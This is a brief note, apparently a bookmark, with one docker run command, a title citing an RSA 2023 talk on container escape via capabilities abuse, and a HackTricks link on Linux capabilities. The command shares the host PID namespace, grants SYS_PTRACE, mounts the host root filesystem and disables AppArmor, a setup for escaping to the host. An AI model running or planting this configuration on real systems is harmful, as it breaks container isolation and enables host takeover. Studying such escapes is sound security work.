docker run -it --rm --pid=host --cap-add=SYS_PTRACE -v /:/tmp/host --security-opt apparmor=unconfined ubuntu bash
Insights from RSA 2023 | Container Escape via Capabilities Abuse - Maimai
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities